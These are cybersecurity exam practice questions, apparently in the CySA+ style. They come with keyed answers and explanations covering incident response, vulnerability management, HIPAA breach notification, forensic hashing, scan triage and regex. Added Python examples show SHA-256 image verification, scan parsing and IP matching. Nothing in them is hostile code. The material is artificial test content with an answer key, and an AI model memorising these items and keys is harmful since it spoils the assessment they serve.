Perform a root cause analysis A root cause analysis can help understand why important alerts were missed and guide improvements in your alert management system to prevent similar oversights in the future. While having more team members may help manage alerts, it does not address the underlying issue of alert fatigue or inadequate alert management. Increasing the alert volume may exacerbate the problem by contributing to alert fatigue, making it more difficult for important alerts to be noticed. Ignoring the issue won't prevent similar incidents in the future. Learning from incidents is a crucial part of improving security posture.
During a collaboration between a startup and a multinational corporation, the signed Memorandum of Understanding (MOU) has placed some limitations on the startup's system access. What could this potentially lead to? Potentially restricting ability to fully remediate vulnerabilities An increase in the cybersecurity measures employed by the multinational corporation A reduction in overall project costs Greater market visibility for the startup
Potentially restricting ability to fully remediate vulnerabilities This situation could potentially lead to the startup having a restricted ability to fully remediate vulnerabilities within their systems. Due to the limitations placed by the MOU, the startup might not have the necessary access to apply patches, make configuration changes, or implement compensating controls as swiftly or comprehensively as needed. This could increase the time it takes to remediate vulnerabilities and potentially increase their exposure to risk. While the MOU outlines the agreement between the two parties, it does not inherently lead to cost reductions. While collaborating with a large corporation may increase visibility, this is unrelated to vulnerability management. The MOU does not directly affect the cybersecurity measures of the multinational corporation.
Among the following strategies for dealing with multiple known vulnerabilities, which one is deemed MOST crucial for their successful management and mitigation? The location of vulnerabilities Prioritizing the risk level associated with each vulnerability The number of vulnerabilities The type of vulnerabilities
Prioritizing the risk level associated with each vulnerability Risk prioritization is an essential part of vulnerability management, focusing on the most significant threats in a cybersecurity landscape. It involves assessing potential vulnerabilities, considering their likelihood of exploitation, and the potential impact of such an event. After prioritizing vulnerabilities, the highest-risk ones are addressed first, using methods such as software patching or security policy enhancement. This process is continuously revisited and adjusted as new threats and vulnerabilities emerge. While knowing where vulnerabilities reside is important, it's not the main factor in prioritization. The risk each vulnerability carries is more critical. The type of vulnerabilities may provide some context, but it is the risk associated with each that should primarily drive prioritization. The number alone does not give an accurate picture of prioritization. Not all vulnerabilities pose the same level of risk.
You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions? Disable unused user accounts Review and enhance patch management policies Proactively sanitize and reimage all of your routers and switches Restrict host access to peripheral protocols like USB or Bluetooth
Proactively sanitize and reimage all of your routers and switches Since your team could not determine the root cause of the compromise, you would most likely conduct system and network hardening actions as part of the recovery and remediation. The only option that is not considered a hardening action is proactively sanitizing and reimaging your routers and switches. If you performed this action, you could have unwanted disruptive effects on the company, and reimaging the network devices without knowing the root cause will likely be ineffective in securing the network. Instead, it would be more beneficial to increase monitoring of the devices to ensure they are not compromised. Proactively sanitizing and reimaging all of the routers and switches would be a large undertaking; without evidence suggesting that such an approach is warranted, you would be wasting a lot of time and money. The other options presented are security best practices to prevent future compromises.
Which of the following types of data breaches would require that the US Department of Health and Human Services and the media be notified if more than 500 individuals are affected by a data breach? Credit card information Personally identifiable information Protected health information Trade secret information
Protected health information Protected health information (PHI) is defined as any information that identifies someone as the subject of medical and insurance records, plus their associated hospital and laboratory test results. This type of data is protected by the Health Insurance Portability and Accountability Act (HIPAA). It requires notification of the individual, the Secretary of the US Department of Health and Human Services (HHS), and the media (if more than 500 individuals are affected) in the case of a data breach. Personally identifiable information (PII) is any data that can be used to identify, contact, or impersonate an individual. Credit card information is protected under the PCI DSS information security standard. Trade secret information is protected by the organization that owns those secrets.
In 2013, retail giant Target Corporation experienced a massive data breach, exposing the credit and debit card information of 40 million customers. Following this security incident, a special team was tasked with investigating the fundamental cause of the breach, uncovering the sequence of events that led to it, and providing insights to prevent such occurrences in the future. What term best describes this deep-dive investigative process? Lessons learned Incident response plan Root cause analysis Forensic analysis
Root cause analysis Root cause analysis involves identifying the initial cause or the underlying factors that contributed to an incident. An incident response plan outlines procedures and processes for handling security incidents. It is a preparation tool, not a post-incident activity to identify the underlying cause of an incident. The lessons learned process involves reviewing an incident to identify what was done well and what needs improvement for future responses. It does not primarily focus on identifying the underlying cause of the incident. While forensic analysis involves a meticulous examination of all evidence related to an incident, its primary aim is not to identify the underlying cause.
Dion Training has just suffered a website defacement of its public-facing webserver. The CEO believes the company's biggest competitor may have done this act of vandalism. The decision has been made to contact law enforcement so that evidence can be collected properly for use in a potential court case. Laura is a digital forensics investigator assigned to collect the evidence. She creates a bit-by-bit disk image of the web server's hard drive as part of her evidence collection. What technology should Laura use after creating the disk image to verify the copy's data integrity matches that of the original web server's hard disk? 3DES AES RSA SHA-256
SHA-256 SHA-256 is the Secure Hash Algorithm with a 256-bit length output. This is one of the most common hash algorithms in use and is employed in many applications and protocols. SHA-256 and other hashing algorithms are used to ensure that the data integrity of a file has not been altered. RSA, 3DES, and AES are all encryption algorithms. These algorithms can ensure confidentiality but not integrity.
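The verification step Laura would perform, as an added example (not code from the original page): hash both the source drive and the image in fixed-size chunks so a multi-gigabyte image never has to be read into memory, then compare the digests. The file paths and the byte payload used by demo() are constructed stand-ins for the real drive and image; the comparison uses hmac.compare_digest only as a habit for comparing digests, since the integrity check itself is the equality of the two hashes.

```python
import hashlib
import hmac
import os
import tempfile

CHUNK_SIZE = 1024 * 1024  # read 1 MiB at a time; the digest is identical to hashing the whole file at once


def sha256_bytes(data: bytes) -> str:
    """Hex SHA-256 of an in-memory buffer (handy for small test vectors)."""
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str) -> str:
    """Hex SHA-256 of a file, streamed chunk by chunk so disk images of any size work."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK_SIZE), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_image(original_path: str, image_path: str):
    """Return (match, original_digest, image_digest).
    Both digests are returned so they can be recorded in the chain-of-custody notes."""
    original_digest = sha256_file(original_path)
    image_digest = sha256_file(image_path)
    return hmac.compare_digest(original_digest, image_digest), original_digest, image_digest


def demo_verify():
    """Constructed sample: a 'drive', a bit-for-bit copy of it, and a copy with one flipped bit.
    Returns (good_copy_matches, tampered_copy_matches)."""
    payload = b"constructed disk contents " * 1000
    tampered = bytearray(payload)
    tampered[100] ^= 0x01  # a single-bit change anywhere is enough to change the digest
    with tempfile.TemporaryDirectory() as d:
        original = os.path.join(d, "original.bin")
        image = os.path.join(d, "image.dd")
        bad_image = os.path.join(d, "tampered.dd")
        for path, data in ((original, payload), (image, payload), (bad_image, bytes(tampered))):
            with open(path, "wb") as f:
                f.write(data)
        return verify_image(original, image)[0], verify_image(original, bad_image)[0]
```

In practice the source digest is taken from the write-blocked original before imaging and again from the image afterwards; a mismatch means the image is not evidence-grade and must be re-acquired.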
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database? Cross-site scripting SQL injection Denial of service Buffer overflow
SQL injection A SQL injection poses the most direct and most impactful threat to an organization's database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to sensitive information disclosure. A buffer overflow attack attempts to overwrite the memory buffer to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn't intended to disclose information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow other malicious code to run. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused on the user, not the server or database.
Dion Training wants to install a new accounting system and is considering moving to a cloud-based solution to reduce cost, reduce the information technology overhead costs, improve reliability, and improve availability. Your Chief Information Officer is supportive of this move since it will be more fiscally responsible. Still, the Chief Risk Officer is concerned with housing all of the company's confidential financial data in a cloud provider's network that might be shared with other companies. Since the Chief Information Officer is determined to move to the cloud, what type of cloud-based solution would you recommend to account for the Chief Risk Officer's concerns? SaaS in a public cloud SaaS in a private cloud PaaS in a community cloud PaaS in a hybrid cloud
SaaS in a private cloud A SaaS (Software as a Service) solution best describes an accounting system or software used as part of a cloud service. This meets the CIO's requirements. To mitigate the concerns of the Chief Risk Officer, you should use a private cloud solution. This type of solution ensures that the cloud provider does not commingle your data with other customers' data and provides dedicated servers and resources for your company's use only.
Which of the following is a best practice that should be followed when scheduling vulnerability scans of an organization's data center? Schedule scans to run during peak times to simulate performance under load Schedule scans to run during periods of low activity Schedule scans to be conducted evenly throughout the day Schedule scans to begin at the same time every day
Schedule scans to run during periods of low activity For the best results, the scans should be scheduled during periods of low activity. This will help to reduce the negative impact of scanning on business operations. The other three options all carry a higher risk of causing disruptions to the network or its business operations.
In the Diamond Model of Intrusion Analysis, what does the Capability component represent? The tools and techniques used in the attack The entity that is targeted by the attack The physical and virtual resources utilized in the attack The entity conducting the attack
The tools and techniques used in the attack The Capability component of the Diamond Model of Intrusion Analysis represents the tools and techniques used in the attack. The entity conducting the attack is represented by the Adversary, not Capability. The entity that is targeted by the attack is represented by the Victim, not Capability. The physical and virtual resources utilized in the attack are represented by Infrastructure, not Capability.
You are a cybersecurity analyst for a mid-sized company. One day, you decided to perform a routine scan of your internal network using the Angry IP Scanner tool. The output returned was as follows:
IP           Ping     Hostname           Ports                      TTL
192.168.1.1  34 ms    router.domain.com  80, 443                    64
192.168.1.2  40 ms    pc1.domain.com     22, 80, 443                128
192.168.1.3  Timeout  pc2.domain.com     -                          -
192.168.1.4  45 ms    unknown.device     21, 23, 25, 80, 443, 3389  64
Based on this output, which of the following represents a potential indicator of compromise (IoC) that should be investigated further? The open ports 80 and 443 on 192.168.1.1 The open port 22 on 192.168.1.2 The unknown device 192.168.1.4 with multiple open ports, including 21, 23, 25, and 3389 The timeout response from 192.168.1.3
The unknown device 192.168.1.4 with multiple open ports, including 21, 23, 25, and 3389 The unknown device at 192.168.1.4 is a potential indicator of compromise (IoC) due to several reasons. First, the device is unknown, which suggests that it's not a recognized system within the network, thus raising suspicions. Secondly, it has multiple ports open, including 21 (FTP), 23 (Telnet), 25 (SMTP), 80 (HTTP), 443 (HTTPS), and 3389 (RDP). These ports being open could indicate services that are vulnerable to exploitation or are already being exploited, especially when they are on an unrecognized device. The combination of an unknown device and open ports commonly used for management or data transfer warrants further investigation. The open ports 80 and 443 on 192.168.1.1 represent standard web services (HTTP and HTTPS). If 192.168.1.1 is a web server or a network device with a web-based management interface (which is common), these ports would likely be open as part of normal operation. The timeout response from 192.168.1.3 is not necessarily an indicator of compromise. It could merely be that the system was offline or unreachable at the time of the scan. The open port 22 on 192.168.1.2 is for SSH, a secure method of remote administration commonly used in many environments. Although it should be secured and monitored, its mere presence isn't an immediate indicator of compromise.
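The triage logic in the explanation, as an added example (not code from the original page or the Angry IP Scanner project): parse the scan table and flag only hosts that are both absent from the asset inventory and exposing cleartext or remote-management services, so that known hosts with web or SSH ports and the timed-out host fall through. The scan text is retyped from the question in the same layout, and the asset inventory and the sensitive-port list are assumptions constructed for the example.

```python
import re

# Constructed sample in the layout of the scan output in the question (retyped for the example).
SCAN_OUTPUT = """\
IP           Ping     Hostname           Ports                      TTL
192.168.1.1  34 ms    router.domain.com  80, 443                    64
192.168.1.2  40 ms    pc1.domain.com     22, 80, 443                128
192.168.1.3  Timeout  pc2.domain.com     -                          -
192.168.1.4  45 ms    unknown.device     21, 23, 25, 80, 443, 3389  64
"""

# Constructed asset inventory: IPs the analyst recognizes as managed systems.
KNOWN_ASSETS = {"192.168.1.1", "192.168.1.2", "192.168.1.3"}

# Cleartext or remote-management services that deserve a second look on an unexpected host.
SENSITIVE_PORTS = {21: "FTP", 23: "Telnet", 25: "SMTP", 3389: "RDP"}

ROW_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<ping>\d+ ms|Timeout)\s+"
    r"(?P<host>\S+)\s+"
    r"(?P<ports>.*?)\s+"        # lazy: the port list may contain ', ' separators
    r"(?P<ttl>\d+|-)\s*$"
)


def parse_scan(text):
    """Turn the scanner's text table into a list of dicts; '-' fields become []/None."""
    hosts = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:               # skips the header row and blank lines
            continue
        ports = [] if m["ports"].strip() == "-" else [int(p) for p in m["ports"].split(",")]
        hosts.append({
            "ip": m["ip"],
            "alive": m["ping"] != "Timeout",
            "hostname": m["host"],
            "ports": ports,
            "ttl": None if m["ttl"] == "-" else int(m["ttl"]),
        })
    return hosts


def flag_hosts(hosts, known=KNOWN_ASSETS):
    """Return findings for hosts that are unrecognized AND expose sensitive services.
    Inventory hosts with only web/SSH ports, and hosts that timed out, are not flagged."""
    findings = []
    for h in hosts:
        unknown = h["ip"] not in known or h["hostname"].startswith("unknown")
        suspicious = sorted(p for p in h["ports"] if p in SENSITIVE_PORTS)
        if unknown and suspicious:
            findings.append({
                "ip": h["ip"],
                "hostname": h["hostname"],
                "suspicious_ports": suspicious,
                "services": [SENSITIVE_PORTS[p] for p in suspicious],
            })
    return findings
```

The two-condition rule mirrors the explanation: neither an unrecognized hostname nor an open management port is an IoC on its own, but the combination is what warrants investigation.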
Your organization's primary operating system vendor just released a critical patch for your servers. Your system administrators have recently deployed this patch and verified the installation was successful. This critical patch was designed to remediate a vulnerability that can allow a malicious actor to execute code on the server over the Internet remotely. You ran a vulnerability scan of the network and determined that all servers are still being reported as having the vulnerability. You verified all your scan configurations are correct. Which of the following might be the reason that the scan report is still showing the servers as vulnerable? (SELECT ALL THAT APPLY) You conducted the vulnerability scan without waiting long enough after the patch was installed The vulnerability assessment scan is returning a false positive The wrong IP address range was scanned during your vulnerability assessment This critical patch did not remediate the vulnerability
The vulnerability assessment scan is returning a false positive This critical patch did not remediate the vulnerability There are two reasonable choices presented: (1) the vulnerability assessment scan is returning a false positive, or (2) this critical patch did not remediate the vulnerability. It is impossible to know which it is based on the description in the question. If the patch was installed successfully, as the question states, then it is possible that the critical patch was coded incorrectly and did not actually remediate the vulnerability. While most operating system vendors test their patches before release to prevent this, extremely critical patches are sometimes rushed into production, and the patch does not actually remediate the vulnerability on all systems. When this occurs, the vendor will issue a subsequent patch to fix it and supersede the original patch. The other option is that the vulnerability assessment tool is incorrectly configured and is returning a false positive. This can occur when the signature used to detect the vulnerability is too specific or too generic to actually detect whether the system was patched for the vulnerability or not. The other options are incorrect, as you do not have to wait a certain period of time after installation before scanning, and it is assumed that you are scanning the same IP range both times since you have verified your scan configuration.
Which of the following is NOT a valid reason to conduct reverse engineering? To allow the software developer to spot flaws in their source code To allow an attacker to spot vulnerabilities in an executable To commit industrial espionage To determine how a piece of malware operates
To allow the software developer to spot flaws in their source code If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system's or application's structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information as to how the malware propagates and what its primary directives are. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor's application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.
When applying patches as part of vulnerability management, why is it crucial to communicate the patching schedule and potential impacts to relevant stakeholders? To help management make effective risk-based decisions on system disruptions due to patching To improve the company's marketing strategies To enable stakeholders to plan company-wide meetings To increase the company's profitability
To help management make effective risk-based decisions on system disruptions due to patching This communication allows stakeholders to understand potential impacts on system availability and to plan activities accordingly, reducing disruptions. Patching schedules have little to do with marketing strategies; the main goal is to manage system availability and reduce disruptions. While secure operations can contribute to profitability, communicating about patching specifically aims to manage system downtime and business impact. While communication is essential in any organization, the purpose of discussing patching schedules specifically is to manage potential system downtime.
An organization is conducting a cybersecurity training exercise. What team is Jason assigned to if he has been asked to monitor and manage the defenders' and attackers' technical environment during the exercise? Red team Blue team White team Purple team
White team Jason is assigned to the white team. The white team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender's mission. A red team is a group of people authorized and organized to emulate a potential adversary's attack or exploitation capabilities against an enterprise's security posture. A blue team is a group of people responsible for defending an enterprise's use of information systems by maintaining its security posture against a group of mock attackers. The purple team is made up of both the blue and red teams to work together to maximize their cyber capabilities through continuous feedback and knowledge transfer between attackers and defenders.
You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b
\b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b The correct option is \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b, which uses parentheses and "OR" operators (|) to delineate the possible whole-word variations of the three IP addresses. Using square brackets indicates that any one of the characters contained in the brackets is matching criteria. Using the + operator indicates an allowance for one or more instances of the preceding element. In all cases, the period must have an escape sequence (\) preceding it, as the period is a reserved operator internal to REGEX.
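An added example (not code from the original page) that runs the alternation against a constructed log excerpt. It goes slightly beyond the question in two ways a practitioner will care about: the three alternatives are wrapped in a non-capturing group so that both \b anchors apply to every address (alternation binds more loosely than \b, so in the ungrouped form only the first and last alternatives are anchored), and the log contains longer look-alike addresses (192.168.66.60, 172.16.66.10) that show why the anchors matter. The two helper functions that exercise the bracket and ungrouped variants are constructed for the example.

```python
import re

# Constructed sample firewall-log excerpt (not from the original page). The longer
# addresses 192.168.66.60 and 172.16.66.10 are decoys that an unanchored pattern would hit.
SAMPLE_LOG = """\
2024-01-01T10:00:00 src=192.168.66.6 dst=10.66.6.10 action=allow
2024-01-01T10:00:01 src=192.168.66.60 dst=172.16.66.1 action=deny
2024-01-01T10:00:02 src=172.16.66.10 dst=192.168.66.6 action=allow
"""

TARGET_IPS = ["192.168.66.6", "10.66.6.10", "172.16.66.1"]


def build_ip_pattern(ips):
    """Alternation of literal addresses inside a non-capturing group, so the leading and
    trailing \\b apply to every alternative rather than only the first and last."""
    alternatives = "|".join(re.escape(ip) for ip in ips)   # re.escape turns '.' into '\\.'
    return re.compile(r"\b(?:" + alternatives + r")\b")


def find_target_ips(text, ips=TARGET_IPS):
    """Every whole-address occurrence of the target IPs, in order of appearance."""
    return build_ip_pattern(ips).findall(text)


def bracket_class_is_not_a_literal(candidate="666.1"):
    """[192\\.168\\.66\\.6] is a character class (any one of 1 9 2 . 6 8), so with +
    it accepts strings that are not the address at all."""
    return re.fullmatch(r"[192\.168\.66\.6]+", candidate) is not None


def ungrouped_alternation_matches_inside_longer_ip(text="10.66.6.100"):
    """Without grouping, \\b binds only to the first and last alternative, so the
    middle address is found inside a longer one."""
    pattern = r"\b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b"
    return re.search(pattern, text) is not None
```

Building the pattern with re.escape also removes the most common mistake with hand-written IP patterns, an unescaped period that silently matches any character.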